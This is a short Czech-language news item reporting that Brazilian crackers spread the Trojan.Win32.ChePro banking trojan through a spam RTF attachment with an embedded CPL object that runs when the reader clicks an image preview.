Na nový způsob distribuce malwaru přišli brazilští crackeři, kteří své oběti infikují pomocí škodlivého RTF souboru.
Útok má víceméně stejný průběh jako jiné podobné podvodné kampaně. Jediný rozdíl je v tom, že místo obvyklého spustitelného souboru, nebo v lepším případě exploitu maskovaného jako pdf, spam obsahuje celkem nevinně vyhlížející RTF soubor nazvaný "Comprovante_Internet_Banking.rtf".
Při otevření souboru se v dokumentu zobrazí náhled obrázku se zprávou "Klikněte pro zvětšení". Nepochybuji o tom, že každého z vás napadne, co se při kliknutí stane. Ano správně. Místo zvětšení obrázku vyskočí na uživatele požadavek povolení spuštění CPL souboru. A ano, jedná se o malware. Podle Kaspersky Lab jde o Trojan.Win32.ChePro, brazilský bankovní trojan napsaný v Delphi.
Jak se zločincům podařio malware do dokumentu dostat? Útočníci jednoduše využili funkci na vložení objektů do RTF dokumentu.